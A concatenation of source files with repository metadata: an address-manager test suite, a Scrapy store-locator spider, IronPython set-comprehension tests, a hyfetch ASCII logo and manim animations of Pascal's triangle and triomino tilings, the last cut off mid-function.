peer1 = PeerInfo("250.1.1.1", 8444)
assert await addrman.add_peer_info([peer1], source)
assert await addrman.size() == 1
peer1_ret = await addrman.select_peer(True)
assert peer1_ret.peer_info == peer1
# Test: move addr to tried, select from new expected nothing returned.
await addrman.mark_good(peer1)
assert await addrman.size() == 1
peer2_ret = await addrman.select_peer(True)
assert peer2_ret is None
peer3_ret = await addrman.select_peer()
assert peer3_ret.peer_info == peer1
# Add three addresses to new table.
peer2 = PeerInfo("250.3.1.1", 8444)
peer3 = PeerInfo("250.3.2.2", 9999)
peer4 = PeerInfo("250.3.3.3", 9999)
assert await addrman.add_peer_info([peer2], PeerInfo("250.3.1.1", 8444))
assert await addrman.add_peer_info([peer3], PeerInfo("250.3.1.1", 8444))
assert await addrman.add_peer_info([peer4], PeerInfo("250.4.1.1", 8444))
# Add three addresses to tried table.
peer5 = PeerInfo("250.4.4.4", 8444)
peer6 = PeerInfo("250.4.5.5", 7777)
peer7 = PeerInfo("250.4.6.6", 8444)
assert await addrman.add_peer_info([peer5], PeerInfo("250.3.1.1", 8444))
await addrman.mark_good(peer5)
assert await addrman.add_peer_info([peer6], PeerInfo("250.3.1.1", 8444))
await addrman.mark_good(peer6)
assert await addrman.add_peer_info([peer7], PeerInfo("250.1.1.3", 8444))
await addrman.mark_good(peer7)
# Test: 6 addrs + 1 addr from last test = 7.
assert await addrman.size() == 7
# Test: Select pulls from new and tried regardless of port number.
ports = []
for _ in range(200):
peer = await addrman.select_peer()
if peer.peer_info.port not in ports:
ports.append(peer.peer_info.port)
if len(ports) == 3:
break
assert len(ports) == 3
@pytest.mark.asyncio
async def test_addrman_collisions_new(self):
addrman = AddressManagerTest()
assert await addrman.size() == 0
source = PeerInfo("252.2.2.2", 8444)
for i in range(1, 8):
peer = PeerInfo("250.1.1." + str(i), 8444)
assert await addrman.add_peer_info([peer], source)
assert await addrman.size() == i
# Test: new table collision!
peer1 = PeerInfo("250.1.1.8", 8444)
assert await addrman.add_peer_info([peer1], source)
assert await addrman.size() == 7
peer2 = PeerInfo("250.1.1.9", 8444)
assert await addrman.add_peer_info([peer2], source)
assert await addrman.size() == 8
@pytest.mark.asyncio
async def test_addrman_collisions_tried(self):
addrman = AddressManagerTest()
assert await addrman.size() == 0
source = PeerInfo("252.2.2.2", 8444)
for i in range(1, 77):
peer = PeerInfo("250.1.1." + str(i), 8444)
assert await addrman.add_peer_info([peer], source)
await addrman.mark_good(peer)
# Test: No collision in tried table yet.
assert await addrman.size() == i
# Test: tried table collision!
peer1 = PeerInfo("250.1.1.77", 8444)
assert await addrman.add_peer_info([peer1], source)
assert await addrman.size() == 76
peer2 = PeerInfo("250.1.1.78", 8444)
assert await addrman.add_peer_info([peer2], source)
assert await addrman.size() == 77
@pytest.mark.asyncio
async def test_addrman_find(self):
addrman = AddressManagerTest()
assert await addrman.size() == 0
peer1 = PeerInfo("250.1.2.1", 8333)
peer2 = PeerInfo("250.1.2.1", 9999)
peer3 = PeerInfo("251.255.2.1", 8333)
source1 = PeerInfo("250.1.2.1", 8444)
source2 = PeerInfo("250.1.2.2", 8444)
assert await addrman.add_peer_info([peer1], source1)
assert not await addrman.add_peer_info([peer2], source2)
assert await addrman.add_peer_info([peer3], source1)
# Test: ensure Find returns an IP matching what we searched on.
info1 = addrman.find_(peer1)
assert info1[0] is not None and info1[1] is not None
assert info1[0].peer_info == peer1
# Test: Find does not discriminate by port number.
info2 = addrman.find_(peer2)
assert info2[0] is not None and info2[1] is not None
assert info2 == info1
# Test: Find returns another IP matching what we searched on.
info3 = addrman.find_(peer3)
assert info3[0] is not None and info3[1] is not None
assert info3[0].peer_info == peer3
@pytest.mark.asyncio
async def test_addrman_create(self):
addrman = AddressManagerTest()
assert await addrman.size() == 0
peer1 = PeerInfo("250.1.2.1", 8444)
t_peer = TimestampedPeerInfo("250.1.2.1", 8444, 0)
info, node_id = addrman.create_(t_peer, peer1)
assert info.peer_info == peer1
info, _ = addrman.find_(peer1)
assert info.peer_info == peer1
@pytest.mark.asyncio
async def test_addrman_delete(self):
addrman = AddressManagerTest()
assert await addrman.size() == 0
peer1 = PeerInfo("250.1.2.1", 8444)
t_peer = TimestampedPeerInfo("250.1.2.1", 8444, 0)
info, node_id = addrman.create_(t_peer, peer1)
# Test: Delete should actually delete the addr.
assert await addrman.size() == 1
addrman.delete_new_entry_(node_id)
assert await addrman.size() == 0
info2, _ = addrman.find_(peer1)
assert info2 is None
@pytest.mark.asyncio
async def test_addrman_get_peers(self):
addrman = AddressManagerTest()
assert await addrman.size() == 0
peers1 = await addrman.get_peers()
assert len(peers1) == 0
peer1 = TimestampedPeerInfo("250.250.2.1", 8444, time.time())
peer2 = TimestampedPeerInfo("250.250.2.2", 9999, time.time())
peer3 = TimestampedPeerInfo("251.252.2.3", 8444, time.time())
peer4 = TimestampedPeerInfo("251.252.2.4", 8444, time.time())
peer5 = TimestampedPeerInfo("251.252.2.5", 8444, time.time())
source1 = PeerInfo("250.1.2.1", 8444)
source2 = PeerInfo("250.2.3.3", 8444)
# Test: Ensure GetPeers works with new addresses.
assert await addrman.add_to_new_table([peer1], source1)
assert await addrman.add_to_new_table([peer2], source2)
assert await addrman.add_to_new_table([peer3], source1)
assert await addrman.add_to_new_table([peer4], source1)
assert await addrman.add_to_new_table([peer5], source1)
# GetPeers returns 23% of addresses, 23% of 5 is 2 rounded up.
peers2 = await addrman.get_peers()
assert len(peers2) == 2
# Test: Ensure GetPeers works with new and tried addresses.
await addrman.mark_good(PeerInfo(peer1.host, peer1.port))
await addrman.mark_good(PeerInfo(peer2.host, peer2.port))
peers3 = await addrman.get_peers()
assert len(peers3) == 2
# Test: Ensure GetPeers still returns 23% when addrman has many addrs.
for i in range(1, 8 * 256):
octet1 = i % 256
octet2 = i >> 8 % 256
peer = TimestampedPeerInfo(str(octet1) + "." + str(octet2) + ".1.23", 8444, time.time())
await addrman.add_to_new_table([peer])
if i % 8 == 0:
await addrman.mark_good(PeerInfo(peer.host, peer.port))
peers4 = await addrman.get_peers()
percent = await addrman.size()
percent = math.ceil(percent * 23 / 100)
assert len(peers4) == percent
@pytest.mark.asyncio
async def test_addrman_tried_bucket(self):
peer1 = PeerInfo("250.1.1.1", 8444)
t_peer1 = TimestampedPeerInfo("250.1.1.1", 8444, 0)
peer2 = PeerInfo("250.1.1.1", 9999)
t_peer2 = TimestampedPeerInfo("250.1.1.1", 9999, 0)
source1 = PeerInfo("250.1.1.1", 8444)
peer_info1 = ExtendedPeerInfo(t_peer1, source1)
# Test: Make sure key actually randomizes bucket placement. A fail on
# this test could be a security issue.
key1 = 2**256 - 1
key2 = 2**128 - 1
bucket1 = peer_info1.get_tried_bucket(key1)
bucket2 = peer_info1.get_tried_bucket(key2)
assert bucket1 != bucket2
# Test: Two addresses with same IP but different ports can map to
# different buckets because they have different keys.
peer_info2 = ExtendedPeerInfo(t_peer2, source1)
assert peer1.get_key() != peer2.get_key()
assert peer_info1.get_tried_bucket(key1) != peer_info2.get_tried_bucket(key1)
# Test: IP addresses in the same group (\16 prefix for IPv4) should
# never get more than 8 buckets
buckets = []
for i in range(255):
peer = PeerInfo("250.1.1." + str(i), 8444)
t_peer = TimestampedPeerInfo("250.1.1." + str(i), 8444, 0)
extended_peer_info = ExtendedPeerInfo(t_peer, peer)
bucket = extended_peer_info.get_tried_bucket(key1)
if bucket not in buckets:
buckets.append(bucket)
assert len(buckets) == 8
# Test: IP addresses in the different groups should map to more than
# 8 buckets.
buckets = []
for i in range(255):
peer = PeerInfo("250." + str(i) + ".1.1", 8444)
t_peer = TimestampedPeerInfo("250." + str(i) + ".1.1", 8444, 0)
extended_peer_info = ExtendedPeerInfo(t_peer, peer)
bucket = extended_peer_info.get_tried_bucket(key1)
if bucket not in buckets:
buckets.append(bucket)
assert len(buckets) > 8
@pytest.mark.asyncio
async def test_addrman_new_bucket(self):
t_peer1 = TimestampedPeerInfo("250.1.2.1", 8444, 0)
source1 = PeerInfo("250.1.2.1", 8444)
t_peer2 = TimestampedPeerInfo("250.1.2.1", 9999, 0)
peer_info1 = ExtendedPeerInfo(t_peer1, source1)
# Test: Make sure key actually randomizes bucket placement. A fail on
# this test could be a security issue.
key1 = 2**256 - 1
key2 = 2**128 - 1
bucket1 = peer_info1.get_new_bucket(key1)
bucket2 = peer_info1.get_new_bucket(key2)
assert bucket1 != bucket2
# Test: Ports should not affect bucket placement in the addr
peer_info2 = ExtendedPeerInfo(t_peer2, source1)
assert peer_info1.get_new_bucket(key1) == peer_info2.get_new_bucket(key1)
# Test: IP addresses in the same group (\16 prefix for IPv4) should
# always map to the same bucket.
buckets = []
for i in range(255):
peer = PeerInfo("250.1.1." + str(i), 8444)
t_peer = TimestampedPeerInfo("250.1.1." + str(i), 8444, 0)
extended_peer_info = ExtendedPeerInfo(t_peer, peer)
bucket = extended_peer_info.get_new_bucket(key1)
if bucket not in buckets:
buckets.append(bucket)
assert len(buckets) == 1
# Test: IP addresses in the same source groups should map to no more
# than 64 buckets.
buckets = []
for i in range(4 * 255):
src = PeerInfo("251.4.1.1", 8444)
t_peer = TimestampedPeerInfo(str(250 + i // 255) + "." + str(i % 256) + ".1.1", 8444, 0)
extended_peer_info = ExtendedPeerInfo(t_peer, src)
bucket = extended_peer_info.get_new_bucket(key1)
if bucket not in buckets:
buckets.append(bucket)
assert len(buckets) <= 64
# Test: IP addresses in the different source groups should map to more
# than 64 buckets.
buckets = []
for i in range(255):
src = PeerInfo("250." + str(i) + ".1.1", 8444)
t_peer = TimestampedPeerInfo("250.1.1.1", 8444, 0)
extended_peer_info = ExtendedPeerInfo(t_peer, src)
bucket = extended_peer_info.get_new_bucket(key1)
if bucket not in buckets:
buckets.append(bucket)
assert len(buckets) > 64
@pytest.mark.asyncio
async def test_addrman_select_collision_no_collision(self):
addrman = AddressManagerTest()
collision = await addrman.select_tried_collision()
assert collision is None
# Add 17 addresses.
source = PeerInfo("252.2.2.2", 8444)
for i in range(1, 18):
peer = PeerInfo("250.1.1." + str(i), 8444)
assert await addrman.add_peer_info([peer], source)
await addrman.mark_good(peer)
# No collisions yet.
assert await addrman.size() == i
collision = await addrman.select_tried_collision()
assert collision is None
# Ensure Good handles duplicates well.
for i in range(1, 18):
peer = PeerInfo("250.1.1." + str(i), 8444)
await addrman.mark_good(peer)
assert await addrman.size() == 17
collision = await addrman.select_tried_collision()
assert collision is None
@pytest.mark.asyncio
async def test_addrman_no_evict(self):
addrman = AddressManagerTest()
# Add 17 addresses.
source = PeerInfo("252.2.2.2", 8444)
for i in range(1, 18):
peer = PeerInfo("250.1.1." + str(i), 8444)
assert await addrman.add_peer_info([peer], source)
await addrman.mark_good(peer)
# No collision yet.
assert await addrman.size() == i
collision = await addrman.select_tried_collision()
assert collision is None
peer18 = PeerInfo("250.1.1.18", 8444)
assert await addrman.add_peer_info([peer18], source)
await addrman.mark_good(peer18)
assert await addrman.size() == 18
collision = await addrman.select_tried_collision()
assert collision.peer_info == PeerInfo("250.1.1.16", 8444)
await addrman.resolve_tried_collisions()
collision = await addrman.select_tried_collision()
assert collision is None
# Lets create two collisions.
for i in range(19, 37):
peer = PeerInfo("250.1.1." + str(i), 8444)
assert await addrman.add_peer_info([peer], source)
await addrman.mark_good(peer)
assert await addrman.size() == i
assert await addrman.select_tried_collision() is None
# Cause a collision.
peer37 = PeerInfo("250.1.1.37", 8444)
assert await addrman.add_peer_info([peer37], source)
await addrman.mark_good(peer37)
assert await addrman.size() == 37
# Cause a second collision.
assert not await addrman.add_peer_info([peer18], source)
await addrman.mark_good(peer18)
assert await addrman.size() == 37
collision = await addrman.select_tried_collision()
assert collision is not None
await addrman.resolve_tried_collisions()
collision = await addrman.select_tried_collision()
assert collision is None
@pytest.mark.asyncio
async def test_addrman_eviction_works(self):
addrman = AddressManagerTest()
assert await addrman.size() == 0
# Empty addrman should return blank addrman info.
assert await addrman.select_tried_collision() is None
# Add twenty two addresses.
source = PeerInfo("252.2.2.2", 8444)
for i in range(1, 18):
peer = PeerInfo("250.1.1." + str(i), 8444)
assert await addrman.add_peer_info([peer], source)
await addrman.mark_good(peer)
# No collision yet.
assert await addrman.size() == i
assert await addrman.select_tried_collision() is None
# Collision between 18 and 16.
peer18 = PeerInfo("250.1.1.18", 8444)
assert await addrman.add_peer_info([peer18], source)
await addrman.mark_good(peer18)
assert await addrman.size() == 18
collision = await addrman.select_tried_collision()
assert collision.peer_info == PeerInfo("250.1.1.16", 8444)
await addrman.simulate_connection_fail(collision)
# Should swap 18 for 16.
await addrman.resolve_tried_collisions()
assert await addrman.select_tried_collision() is None
# If 18 was swapped for 16, then this should cause no collisions.
assert not await addrman.add_peer_info([peer18], source)
await addrman.mark_good(peer18)
assert await addrman.select_tried_collision() is None
# If we insert 16 is should collide with 18.
addr16 = PeerInfo("250.1.1.16", 8444)
assert not await addrman.add_peer_info([addr16], source)
await addrman.mark_good(addr16)
collision = await addrman.select_tried_collision()
assert collision.peer_info == PeerInfo("250.1.1.18", 8444)
await addrman.resolve_tried_collisions()
assert await addrman.select_tried_collision() is None
@pytest.mark.asyncio
# use tmp_path pytest fixture to create a temporary directory
async def test_serialization(self, tmp_path: Path):
addrman = AddressManagerTest()
now = int(math.floor(time.time()))
t_peer1 = TimestampedPeerInfo("250.7.1.1", uint16(8333), uint64(now - 10000))
t_peer2 = TimestampedPeerInfo("250.7.2.2", uint16(9999), uint64(now - 20000))
t_peer3 = TimestampedPeerInfo("250.7.3.3", uint16(9999), uint64(now - 30000))
source = PeerInfo("252.5.1.1", uint16(8333))
await addrman.add_to_new_table([t_peer1, t_peer2, t_peer3], source)
await addrman.mark_good(PeerInfo("250.7.1.1", uint16(8333)))
peers_dat_filename = tmp_path / "peers.dat"
if peers_dat_filename.exists():
peers_dat_filename.unlink()
# Write out the serialized peer data
await AddressManagerStore.serialize(addrman, peers_dat_filename)
# Read in the serialized peer data
addrman2 = await AddressManagerStore.create_address_manager(peers_dat_filename)
retrieved_peers = []
for _ in range(50):
peer = await addrman2.select_peer()
if peer not in retrieved_peers:
retrieved_peers.append(peer)
if len(retrieved_peers) == 3:
break
assert len(retrieved_peers) == 3
wanted_peers = [
ExtendedPeerInfo(t_peer1, source),
ExtendedPeerInfo(t_peer2, source),
ExtendedPeerInfo(t_peer3, source),
]
recovered = 0
for target_peer in wanted_peers:
for current_peer in retrieved_peers:
if (
current_peer is not None
and current_peer.peer_info == target_peer.peer_info
and current_peer.src == target_peer.src
and current_peer.timestamp == target_peer.timestamp
):
recovered += 1
assert recovered == 3
peers_dat_filename.unlink()
@pytest.mark.asyncio
async def test_cleanup(self):
addrman = AddressManagerTest()
peer1 = TimestampedPeerInfo("250.250.2.1", 8444, 100000)
peer2 = TimestampedPeerInfo("250.250.2.2", 9999, time.time())
source = PeerInfo("252.5.1.1", 8333)
assert await addrman.add_to_new_table([peer1], source)
assert await addrman.add_to_new_table([peer2], source)
await addrman.mark_good(PeerInfo("250.250.2.2", 9999))
assert await addrman.size() == 2
for _ in range(5):
await addrman.attempt(PeerInfo(peer1.host, peer1.port), True, time.time() - 61)
addrman.cleanup(7 * 3600 * 24, 5)
assert await addrman.size() == 1
|
0ffd7c940dd369a9bc2d7daef08b4e02e72b7c25
|
71acb7214efd91c0d327f6d8958e1798eadb4401
|
/locations/spiders/burger_king.py
|
eeebbe2e77ff61bd2988713606b948178b9b34ed
|
[
"CC0-1.0",
"MIT"
] |
permissive
|
alltheplaces/alltheplaces
|
21b9f8b4ace1352e52ae7b8f8825a930d2cb033e
|
1bcbb55cfcf06f2c714465570711f6e83f205c22
|
refs/heads/master
| 2023-08-30T19:45:35.098658
| 2023-08-30T17:51:54
| 2023-08-30T17:51:54
| 61,166,935
| 453
| 176
|
NOASSERTION
| 2023-09-14T17:16:40
| 2016-06-15T01:09:18
|
Python
|
UTF-8
|
Python
| false
| false
| 6,909
|
py
|
burger_king.py
|
import scrapy
from locations.dict_parser import DictParser
from locations.geo import city_locations, point_locations
class BurgerKingSpider(scrapy.Spider):
name = "burgerking"
item_attributes = {"brand": "Burger King", "brand_wikidata": "Q177054"}
download_delay = 2.0
custom_settings = {"ROBOTSTXT_OBEY": False}
def make_request(self, lat, lon, country_code, search_radius, result_limit):
body = [
{
"operationName": "GetRestaurants",
"variables": {
"input": {
"filter": "NEARBY",
"coordinates": {
"userLat": float(lat),
"userLng": float(lon),
"searchRadius": search_radius,
},
"first": result_limit,
}
},
"query": (
"query GetRestaurants($input: RestaurantsInput) {\n"
" restaurants(input: $input) {\n"
" pageInfo {\n"
" hasNextPage\n"
" endCursor\n"
" __typename\n"
" }\n"
" totalCount\n"
" nodes {\n"
" ...RestaurantNodeFragment\n"
" __typename\n"
" }\n"
" __typename\n"
" }\n"
"}\n"
"\n"
"fragment RestaurantNodeFragment on RestaurantNode {\n"
" _id\n"
" storeId\n"
" curbsideHours {\n"
" ...OperatingHoursFragment\n"
" __typename\n"
" }\n"
" deliveryHours {\n"
" ...OperatingHoursFragment\n"
" __typename\n"
" }\n"
" diningRoomHours {\n"
" ...OperatingHoursFragment\n"
" __typename\n"
" }\n"
" driveThruHours {\n"
" ...OperatingHoursFragment\n"
" __typename\n"
" }\n"
" email\n"
" franchiseGroupName\n"
" hasDelivery\n"
" hasDriveThru\n"
" hasTakeOut\n"
" hasWifi\n"
" id\n"
" isDarkKitchen\n"
" isHalal\n"
" latitude\n"
" longitude\n"
" name\n"
" phoneNumber\n"
" physicalAddress {\n"
" address1\n"
" address2\n"
" city\n"
" country\n"
" postalCode\n"
" stateProvince\n"
" stateProvinceShort\n"
" __typename\n"
" }\n"
" __typename\n"
"}\n"
"\n"
"fragment OperatingHoursFragment on OperatingHours {\n"
" friClose\n"
" friOpen\n"
" monClose\n"
" monOpen\n"
" satClose\n"
" satOpen\n"
" sunClose\n"
" sunOpen\n"
" thrClose\n"
" thrOpen\n"
" tueClose\n"
" tueOpen\n"
" wedClose\n"
" wedOpen\n"
" __typename\n"
"}\n"
),
}
]
return scrapy.http.JsonRequest(
"https://use1-prod-bk.rbictg.com/graphql",
data=body,
headers={"x-ui-language": "en", "x-ui-region": country_code},
cb_kwargs=dict(country_code=country_code),
)
def make_city_request(self, city_name, country_code, search_radius, result_limit):
for city in city_locations(country_code):
if city["name"].lower() == city_name.lower():
return self.make_request(
city["latitude"],
city["longitude"],
country_code,
search_radius,
result_limit,
)
raise Exception("Bogus City: " + city_name)
def start_requests(self):
# TODO: DK, IE, MX, at the least do not follow this API.
# TODO: https://www.burgerking.nl/kingfinder
# TODO: has an interface for central european and nordic countries
yield self.make_city_request("Calgary", "CA", 1000000, 20000)
yield self.make_city_request("Toronto", "CA", 1000000, 20000)
yield self.make_city_request("Frankfurt am Main", "DE", 1000000, 20000)
yield self.make_city_request("Leeds", "GB", 1000000, 20000)
yield self.make_city_request("Auckland", "NZ", 1000000, 20000)
# So many stores in the US that we need to be kind to the BK back end.
for lat, lon in point_locations("us_centroids_100mile_radius.csv"):
yield self.make_request(lat, lon, "US", 128000, 20000)
store_locator_templates = {
"CA": "https://www.burgerking.ca/store-locator/store/{}",
"DE": "https://www.burgerking.de/store-locator/store/{}",
"GB": "https://www.burgerking.co.uk/store-locator/store/{}",
"NZ": "https://www.burgerking.co.nz/store-locator/store/{}",
"US": "https://www.bk.com/store-locator/store/{}",
}
def parse(self, response, country_code):
for row in response.json()[0]["data"]["restaurants"]["nodes"]:
row.update(row.pop("physicalAddress"))
item = DictParser.parse(row)
item["name"] = "Burger King"
item["country"] = country_code
item["addr_full"] = None
item["website"] = self.store_locator_templates[country_code].format(row["_id"])
item["extras"] = {
"operator": row["franchiseGroupName"],
"internet_access": "wlan" if row["hasWifi"] is True else "no",
"diet:halal": "yes" if row["isHalal"] is True else "no",
"delivery": "yes" if row["hasDelivery"] is True else "no",
"drive_through": "yes" if row["hasDriveThru"] is True else "no",
"takeaway": "yes" if row["hasTakeOut"] is True else "no",
}
# TODO: somebody could decode the opening hours from the BK JSON.
yield item
|
4baa98690159b14626a6a19852bfe340f0a8b787
|
73f4f74f678fadee409560b78ffacb7aec38c545
|
/Tests/test_setcomp.py
|
9ec659173ddd7b240e1eaf0549fd51801ecf2475
|
[
"LicenseRef-scancode-unknown-license-reference",
"Apache-2.0"
] |
permissive
|
IronLanguages/ironpython3
|
14ec38566d7c27675215042d72e38f6a979011ab
|
e8ed79bd7f0f33eb2af1a538dd7e98767c86c211
|
refs/heads/master
| 2023-09-03T03:36:51.590171
| 2023-09-02T19:02:51
| 2023-09-02T19:02:51
| 17,266,066
| 2,396
| 349
|
Apache-2.0
| 2023-09-09T01:46:11
| 2014-02-27T21:50:49
|
Python
|
UTF-8
|
Python
| false
| false
| 3,769
|
py
|
test_setcomp.py
|
# Licensed to the .NET Foundation under one or more agreements.
# The .NET Foundation licenses this file to you under the Apache 2.0 License.
# See the LICENSE file in the project root for more information.
import unittest
from iptest import run_test
class SetCompTest(unittest.TestCase):
def test_set_comp(self):
self.assertEqual({locals()['x'] for x in (2,3,4)}, set([2, 3, 4]))
x = 100
{x for x in (2,3,4)}
self.assertEqual(x, 100)
class C:
{x for x in (2,3,4)}
self.assertEqual(hasattr(C, 'x'), False)
class C:
abc = {locals()['x'] for x in (2,3,4)}
self.assertEqual(C.abc, set([2,3,4]))
d = {}
exec(compile("abc = {locals()['x'] for x in (2,3,4)}", 'exec', 'exec'), d, d)
self.assertEqual(d['abc'], set([2,3,4]))
d = {'y':42}
exec(compile("abc = {y for x in (2,3,4)}", 'exec', 'exec'), d, d)
self.assertEqual(d['abc'], set([42]))
d = {'y':42, 't':(2,3,42)}
exec(compile("abc = {y for x in t if x == y}", 'exec', 'exec'), d, d)
self.assertEqual(d['abc'], set([42]))
t = (2,3,4)
v = 2
abc = {v for x in t}
self.assertEqual(abc, set([2]))
abc = {x for x in t if x == v}
self.assertEqual(abc, set([2]))
def f():
abc = {x for x in t if x == v}
self.assertEqual(abc, set([2]))
f()
def f():
abc = {v for x in t}
self.assertEqual(abc, set([2]))
class C:
abc = {v for x in t}
self.assertEqual(abc, set([2]))
class C:
abc = {x for x in t if x == v}
self.assertEqual(abc, set([2]))
def test_scope_mixing(self):
k = 1
v = 3
# in source
r = {k for k in range(v)} # TODO: "range(v + k)" fails in IPY, but not in CPython
self.assertEqual(r, set([0, 1, 2]))
# in condition
r = {k for k in range(4) if k < v}
self.assertEqual(r, set([0, 1, 2]))
# in item generation
r = {k+v for k in range(2)}
self.assertEqual(r, set([3, 4]))
def test_scope_mixing_closures(self):
# see also: GitHub issue #1196
def eval(f, i):
return f(i)
v = 2
# in source
r = {k for k in eval(lambda i: range(i+v), v)}
self.assertEqual(r, set([0, 1, 2, 3]))
# in condition
r = {k for k in range(4) if eval(lambda i: i>=v, k)}
self.assertEqual(r, set([2, 3]))
# in item generation
r = {eval(lambda i: i+v, k+v) for k in range(2)}
self.assertEqual(r, set([4, 5]))
def test_ipy3_gh809(self):
"""https://github.com/IronLanguages/ironpython3/issues/809"""
# iterable is evaluated in the outer scope
self.assertIn('self', {x for x in dir()})
# this rule applies recursively to nested comprehensions
self.assertIn('self', {x for x in {y for y in dir()}})
self.assertIn('self', {x for x in {y for y in {z for z in dir()}}})
# this only applies to the first iterable
# subsequent iterables are evaluated within the comprehension scope
self.assertEqual({(0, 'x')}, {(x, y) for x in range(1) for y in dir() if not y.startswith('.')}) # (filtering out auxiliary variable staring with a dot, used by CPython)
# also subsequent conditions are evaluated within the comprehension scope
a, b, c, d = range(4)
self.assertTrue(len(dir()) >= 4)
self.assertEqual(set(), {dir() for x in range(1) if len(dir()) >= 4})
# lambdas create a new scope
self.assertEqual(set(), {x for x in (lambda: dir())()})
run_test(__name__)
|
f06645292d14e889a7e5d970113f63d39c9f55d2
|
854b94d7be92582bd191a7cb63143a95e5b5c337
|
/hyfetch/distros/aperture.py
|
0ca3bcfcabee3497f40e805fcbfdd723b1a65b99
|
[
"MIT"
] |
permissive
|
hykilpikonna/hyfetch
|
673c0c999d0f3f542349824495ad6004f450ebac
|
98863df16d70b030696f4b94080d114396320f35
|
refs/heads/master
| 2023-08-17T10:41:10.289997
| 2023-08-17T03:37:23
| 2023-08-17T03:37:23
| 479,913,941
| 447
| 78
|
MIT
| 2023-09-14T14:39:18
| 2022-04-10T04:38:15
|
Shell
|
UTF-8
|
Python
| false
| false
| 911
|
py
|
aperture.py
|
# This file is automatically generated. Please do not modify.
from . import AsciiArt
aperture = AsciiArt(match=r'''"Aperture"*''', color='6 6 7 1', ascii=r"""
${c1} .,-:;//;:=,
. :H@@@MM@M#H/.,+%;,
,/X+ +M@@M@MM%=,-%HMMM@X/,
-+@MM; $M@@MH+-,;XMMMM@MMMM@+-
;@M@@M- XM@X;. -+XXXXXHHH@M@M#@/.
,%MM@@MH ,@%= .---=-=:=,.
=@#@@@MX., -%HX$$%%%:;
=-./@M@M$ .;@MMMM@MM:
X@/ -$MM/ . +MM@@@M$
,@M@H: :@: . =X#@@@@-
,@@@MMX, . /H- ;@M@M=
.H@@@@M@+, %MM+..%#$.
/MMMM@MMH/. XM@MH; =;
/%+%$XHH@$= , .H@@@@MX,
.=--------. -%H.,@@@@@MX,
.%MM@@@HHHXX$$$%+- .:$MMX =M@@MM%.
=XMMM@MM@MM#H;,-+HMM@M+ /MMMX=
=%@M@M#@$-.=$@MM@@@M; %M%=
,:+$+-,/H#MMMMMMM@= =,
=++%%%%+/:-.
""")
|
57bd0f06bf2c497886150d8ecd9c414287d08acf
|
5396a46275e52bfc972f05097e925742d5bbf2d1
|
/outside_videos/patterns.py
|
7eb5912e8b1cd1801515a1a6aa83c59220afc804
|
[
"MIT"
] |
permissive
|
3b1b/videos
|
6ab0e4fe0fb07d15b5455f8726131a880437c42c
|
e841b1410fdda2d3bddb7cfa12ce070a3b66a026
|
refs/heads/master
| 2023-08-29T01:37:23.424512
| 2023-08-16T03:35:03
| 2023-08-16T03:35:03
| 325,873,493
| 4,601
| 1,868
| null | 2023-03-30T08:15:37
| 2020-12-31T21:07:33
|
Python
|
UTF-8
|
Python
| false
| false
| 5,525
|
py
|
patterns.py
|
from manim_imports_ext import *
class PascalColored(Scene):
CONFIG = {
"colors": [BLUE_E, BLUE_D, BLUE_B],
"dot_radius": 0.16,
"n_layers": 2 * 81,
"rt_reduction_factor": 0.5,
}
def construct(self):
max_height = 6
rt = 1.0
layers = self.get_dots(self.n_layers)
triangle = VGroup(layers[0])
triangle.to_edge(UP, buff=LARGE_BUFF)
self.add(triangle)
last_layer = layers[0]
for layer in layers[1:]:
height = last_layer.get_height()
layer.set_height(height)
layer.next_to(last_layer, DOWN, 0.3 * height)
for i, dot in enumerate(layer):
pre_dots = VGroup(*last_layer[max(i - 1, 0):i + 1])
self.play(*[
ReplacementTransform(
pre_dot.copy(), dot,
run_time=rt
)
for pre_dot in pre_dots
])
last_layer = layer
triangle.add(layer)
if triangle.get_height() > max_height:
self.play(
triangle.set_height, 0.5 * max_height,
triangle.to_edge, UP, LARGE_BUFF
)
rt *= self.rt_reduction_factor
print(rt)
self.wait()
def get_pascal_point(self, n, k):
return n * rotate_vector(RIGHT, -2 * np.pi / 3) + k * RIGHT
def get_dot_layer(self, n):
n_to_mod = len(self.colors)
dots = VGroup()
for k in range(n + 1):
point = self.get_pascal_point(n, k)
# p[0] *= 2
nCk_residue = choose(n, k) % n_to_mod
dot = Dot(
point,
radius=2 * self.dot_radius,
color=self.colors[nCk_residue]
)
if n <= 9:
num = OldTex(str(nCk_residue))
num.set_height(0.5 * dot.get_height())
num.move_to(dot)
dot.add(num)
# num = DecimalNumber(choose(n, k), num_decimal_points = 0)
# num.set_color(dot.get_color())
# max_width = 2*dot.get_width()
# max_height = dot.get_height()
# if num.get_width() > max_width:
# num.set_width(max_width)
# if num.get_height() > max_height:
# num.set_height(max_height)
# num.move_to(dot, aligned_edge = DOWN)
dots.add(dot)
return dots
def get_dots(self, n_layers):
dots = VGroup()
for n in range(n_layers + 1):
dots.add(self.get_dot_layer(n))
return dots
class TriominoGrid(Scene):
CONFIG = {
"random_seed": 4,
"n": 4,
}
def construct(self):
n = self.n
grid = VGroup(*[
VGroup(*[
Square()
for x in range(2**n)
]).arrange(RIGHT, buff=0)
for y in range(2**n)
]).arrange(UP, buff=0)
for row in grid:
for square in row:
square.is_covered = False
grid.set_fill(BLUE, 1)
grid.set_stroke(WHITE, 1)
covered_x = random.randint(0, 2**n - 1)
covered_y = random.randint(0, 2**n - 1)
covered = grid[covered_x][covered_y]
covered.is_covered = True
covered.set_fill(RED)
grid.set_height(6)
self.add(grid)
self.triominos = VGroup()
self.add(self.triominos)
self.cover_grid(grid)
colors = [
BLUE_C,
BLUE_E,
BLUE_D,
BLUE_B,
MAROON_C,
MAROON_E,
MAROON_D,
MAROON_B,
YELLOW,
GREY_BROWN,
GREY_B,
GREEN_C,
GREEN_E,
GREEN_D,
GREEN_B,
]
random.shuffle(colors)
for triomino, color in zip(self.triominos, it.cycle(colors)):
triomino.set_color(color)
triomino.scale(0.95)
self.play(ShowIncreasingSubsets(
self.triominos,
run_time=5
))
def cover_grid(self, grid):
N = len(grid) # N = 2**n
if N == 1:
return
q1 = VGroup(*[row[:N // 2] for row in grid[:N // 2]])
q2 = VGroup(*[row[:N // 2] for row in grid[N // 2:]])
q3 = VGroup(*[row[N // 2:] for row in grid[:N // 2]])
q4 = VGroup(*[row[N // 2:] for row in grid[N // 2:]])
quads = [q1, q2, q3, q4]
for q in quads:
squares = [
square
for row in q
for square in row
]
q.has_covered = any([s.is_covered for s in squares])
corner_index = np.argmin([
get_norm(s.get_center() - grid.get_center())
for s in squares
])
q.inner_corner = squares[corner_index]
covered_quad_index = [q.has_covered for q in quads].index(True)
covered_quad = quads[covered_quad_index]
hugging_triomino = VGroup()
for q in quads:
